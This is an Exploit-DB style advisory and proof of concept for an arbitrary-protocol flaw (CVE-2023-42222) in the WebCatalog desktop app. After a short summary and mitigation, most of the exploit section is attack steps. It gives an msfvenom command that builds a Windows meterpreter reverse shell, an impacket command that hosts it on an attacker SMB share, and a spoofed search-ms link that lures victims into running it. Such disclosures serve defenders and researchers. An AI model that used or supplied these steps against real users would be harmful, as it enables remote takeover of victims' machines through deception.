WebCatalog 48.4 - Arbitrary Protocol Execution

vendor:

WebCatalog

by:

ItsSixtyN3in

7.1

CVSS

HIGH

Arbitrary Protocol Execution

918

CWE

Product Name: WebCatalog

Affected Version From: 48.4.0

Affected Version To: 48.7.9

Patch Exists: NO

Related CWE: CVE-2023-42222

CPE: a:webcatalog:webcatalog:48.4.0

Metasploit:

Other Scripts:

Platforms Tested: Windows

2023

WebCatalog 48.4 – Arbitrary Protocol Execution

WebCatalog version 48.4 and earlier does not properly validate URLs before calling the Electron shell.openExternal function, enabling an attacker to execute code via arbitrary protocols when users interact with malicious URLs. This can lead to the bypassing of security mechanisms for delivering malicious files.

Mitigation:

Update WebCatalog to version 48.8 or later to fix this vulnerability. Avoid interacting with unsolicited or suspicious links.

Source

Exploit-DB raw data:

# Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution
# Date: 9/27/2023
# Exploit Author: ItsSixtyN3in
# Vendor Homepage: https://webcatalog.io/en/
# Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe
# Version: 48.4.0
# Tested on: Windows
# CVE : CVE-2023-42222

Vulnerability summary:
WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery.

Exploit details:

-   Create a reverse shell file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe



-   Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py)

python3 smbserver.py Tools -smb2support



-   Have the user sync a page with the payload as a renamed link

[Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title)



Payload:
search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title

Tobias Diehl
Security Consultant
OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300
Pronouns: he/him
e-mail:  tobias.diehl@bulletproofsi.com